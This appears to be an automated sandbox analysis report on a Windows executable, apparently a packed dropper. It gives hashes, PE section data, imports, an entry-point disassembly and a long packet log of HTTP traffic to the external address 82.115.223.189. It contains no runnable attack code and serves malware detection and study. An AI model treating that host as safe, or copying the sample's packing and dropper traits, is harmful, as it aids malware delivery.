                                          Preview:..Pinging 127.0.0.1 with 32 bytes of data:..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128....Ping statistics for 127.0.0.1:.. Packets: Sent = 2, Received = 2, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..
                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                          Entropy (8bit):7.979237372586947
                                          TrID:
                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                          • DOS Executable Generic (2002/1) 0.02%
                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                          File name:BWuMwnE7tw.exe
                                          File size:962'644 bytes
                                          MD5:bc9e4510fe172f8155d02b28ab79da83
                                          SHA1:317b2bdf893072d9d5d1484d89ab590ec810b6c4
                                          SHA256:1dd4a56cf8d794eaf33526b673750be20b5d052645a4abfc13fd92781b878d8f
                                          SHA512:5d323c6d8eb9cfe7016a3dc730509abb5626736575d9b124091ac116dac3c82f9b63a2057da71102c3dff74b83a9df8afc72d6568b06c229888092fa07eb6653
                                          SSDEEP:24576:XQ9oPNA53qTkMxCYabkLC9ysvbvpByRiwiA9eOUr2+:XQQNSdfqC9LhByRiwiAEOUB
                                          TLSH:BB25332BC4CA3572F77941781CDB99DED1B30674592634B9F31E28786B1708392EA2E3
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......._...............................y...........3...........Rich............................PE..L.....FM...........................
                                          Icon Hash:2d232d65b7924633
                                          Entrypoint:0x401d20
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                          DLL Characteristics:
                                          Time Stamp:0x4D46F4ED [Mon Jan 31 17:44:13 2011 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:d221b1dc8c3a08622f6512e7876527c8
                                          Instruction
                                          push ebp
                                          mov ebp, esp
                                          push FFFFFFFFh
                                          push 00402128h
                                          push 00401EA0h
                                          mov eax, dword ptr fs:[00000000h]
                                          push eax
                                          mov dword ptr fs:[00000000h], esp
                                          sub esp, 68h
                                          push ebx
                                          push esi
                                          push edi
                                          mov dword ptr [ebp-18h], esp
                                          xor ebx, ebx
                                          mov dword ptr [ebp-04h], ebx
                                          push 00000002h
                                          call dword ptr [00402088h]
                                          pop ecx
                                          or dword ptr [00403554h], FFFFFFFFh
                                          or dword ptr [00403558h], FFFFFFFFh
                                          call dword ptr [00402084h]
                                          mov ecx, dword ptr [004032CCh]
                                          mov dword ptr [eax], ecx
                                          call dword ptr [00402080h]
                                          mov ecx, dword ptr [004032C8h]
                                          mov dword ptr [eax], ecx
                                          mov eax, dword ptr [0040207Ch]
                                          mov eax, dword ptr [eax]
                                          mov dword ptr [0040355Ch], eax
                                          call 00007FEE684F8275h
                                          cmp dword ptr [004032BCh], ebx
                                          jne 00007FEE684F816Eh
                                          push 00401E9Ch
                                          call dword ptr [00402078h]
                                          pop ecx
                                          call 00007FEE684F8247h
                                          push 0040300Ch
                                          push 00403008h
                                          call 00007FEE684F8232h
                                          mov eax, dword ptr [004032C4h]
                                          mov dword ptr [ebp-6Ch], eax
                                          lea eax, dword ptr [ebp-6Ch]
                                          push eax
                                          push dword ptr [004032C0h]
                                          lea eax, dword ptr [ebp-64h]
                                          push eax
                                          lea eax, dword ptr [ebp-70h]
                                          push eax
                                          lea eax, dword ptr [ebp-60h]
                                          push eax
                                          call dword ptr [00402070h]
                                          push 00403004h
                                          push 00403000h
                                          call 00007FEE684F81FFh
                                          Programming Language:
                                          • [LNK] VS98 (6.0) imp/exp build 8168
                                          • [ C ] VS98 (6.0) build 8168
                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x21340x50.rdata
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xe70000x3e14.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000xa4.rdata
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          .text0x10000xeac0x10009ce5929599c65c95975bf6e171805391False0.645751953125data5.941998707599442IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                          .rdata0x20000x4880x10005fc9e866c251197a1a9edc07825eb368False0.154541015625data1.727742082707414IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .data0x30000x5600x1000d4a8a270215b2fec747caabfd58d8f7bFalse0.082275390625Matlab v4 mat-file (little endian) ot create gentee.dll!, numeric, rows 0, columns 01.0105421694922874IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .gentee0x40000xe2a300xe300068e58a0afbb9d48cc7faaed3ee2ca498False0.9985147215721366data7.999465624219395IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .rsrc0xe70000x3e140x4000908ba435b01a86f8b9cfc509860ed28bFalse0.83856201171875data7.6523549989474855IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                          RT_ICON0xe715c0x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152EnglishUnited States0.5221119133574007
                                          RT_RCDATA0xe7a040x2c6bdata0.9976255386509542
                                          RT_GROUP_ICON0xea6700x14data1.15
                                          RT_MANIFEST0xea6840x790XML 1.0 document, ASCII text, with very long lines (326), with CRLF, LF line terminatorsEnglishUnited States0.3574380165289256
                                          DLLImport
                                          KERNEL32.dllCloseHandle, WriteFile, CreateDirectoryA, lstrcpyA, CreateFileA, GetFileAttributesA, lstrlenA, GetTempPathA, lstrcmpA, lstrcatA, ExitProcess, DeleteFileA, FreeLibrary, GetProcAddress, LoadLibraryA, GetModuleHandleA, GetFileSize, GetLastError, CreateMutexA, GetModuleFileNameA, VirtualAlloc, VirtualFree, GetStartupInfoA
                                          USER32.dllMessageBoxA, wsprintfA
                                          MSVCRT.dll_exit, _XcptFilter, exit, _acmdln, __getmainargs, _initterm, __setusermatherr, _adjust_fdiv, __p__commode, __p__fmode, __set_app_type, _except_handler3, _controlfp
                                          Language of compilation systemCountry where language is spokenMap
                                          EnglishUnited States
                                          TimestampSource PortDest PortSource IPDest IP
                                          Nov 20, 2024 07:48:01.611100912 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:01.680942059 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:01.681093931 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:01.681282997 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:01.686117887 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.291048050 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.291078091 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.291090965 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.291099072 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.291114092 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.291127920 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.291142941 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.291156054 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.291172028 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.291186094 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.291210890 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.291297913 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.291297913 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.296274900 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.296291113 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.296307087 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.296351910 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.344619036 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.381501913 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.381520987 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.381536007 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.381551027 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.381622076 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.381675005 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.381764889 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.381824970 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.381839991 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.381855011 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.381869078 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.381875038 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.381907940 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.382811069 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.382826090 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.382833958 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.382841110 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.382849932 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.382908106 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.383630037 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.383645058 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.383661032 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.383675098 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.383690119 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.383701086 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.383733988 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.384602070 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.384617090 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.384633064 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.384650946 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.384654999 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.384706020 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.386553049 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.386615992 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.386624098 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.438213110 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.472117901 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.472134113 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.472157001 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.472173929 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.472189903 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.472196102 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.472245932 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.472276926 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.472291946 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.472307920 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.472327948 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.472376108 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.472431898 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.472446918 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.472462893 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.472487926 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.472820997 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.472836018 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.472851992 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.472875118 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.472877979 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.472894907 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.472908974 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.472923040 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.472924948 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.472938061 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.472944021 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.472969055 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.473444939 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.473459959 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.473475933 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.473490000 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.473496914 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.473505020 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.473520041 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.473534107 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.473535061 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.473550081 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.473552942 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.473567009 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.473586082 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.473623037 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.474024057 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.474183083 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.474198103 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.474212885 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.474225998 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.474239111 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.474241972 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.474256039 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.474261045 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.474272966 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.474282980 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.474289894 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.474306107 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.474318981 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.474322081 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.474356890 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.475090981 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.475106001 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.475121975 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.475136042 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.475143909 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.475152016 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.475163937 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.475167990 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.475184917 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.475200891 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.475207090 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.475218058 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.475244999 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.475264072 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.477092028 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.477108002 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.477123022 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.477157116 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.531963110 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.562747955 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.562871933 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.562886953 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.562901974 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.562916994 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.562932968 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.562949896 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.562941074 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.562963963 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.562994957 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.563015938 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.563015938 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.563019037 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.563035965 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.563045025 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.563050032 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.563066006 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.563077927 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.563080072 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.563096046 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.563111067 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.563124895 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.563126087 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.563127041 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.563152075 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.563246965 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.563267946 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.563286066 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.563288927 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.563301086 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.563324928 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.563339949 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.563355923 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.563355923 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.563371897 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.563376904 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.563394070 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.563401937 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.563441038 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.563584089 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.563600063 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.563615084 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.563628912 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.563652039 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.563654900 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.563669920 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.563678026 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.563684940 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.563699007 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.563714981 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.563724995 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.563731909 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.563744068 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.563747883 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.563767910 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.563770056 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.563782930 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.563796997 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.563812971 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.563827991 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.563848972 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.564059973 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.564124107 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.564157963 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.564172983 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.564198017 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.564213037 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.564218044 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.564227104 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.564243078 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.564259052 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.564263105 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.564273119 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.564286947 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.564287901 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.564302921 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.564320087 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.564335108 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.564337015 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.564353943 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.564387083 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.568099976 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.568114996 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.568130016 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.568171024 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.568264008 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.568279028 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.568294048 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.568315983 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.568325043 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.568336964 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.568347931 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.568361998 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.568376064 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.568389893 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.568391085 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.568407059 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.568419933 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.568430901 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.568439007 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.568450928 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.568461895 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.568476915 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.568491936 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.568504095 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.568506956 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.568522930 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.568528891 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.568564892 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.568789959 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.568814039 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.568837881 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.568845034 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.568852901 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.568870068 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.568882942 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.568888903 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.568901062 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.568914890 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.568914890 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.568932056 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.568944931 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.568948030 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.568988085 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.569041967 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.569056988 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.569083929 CET4970480192.168.2.582.115.223.189
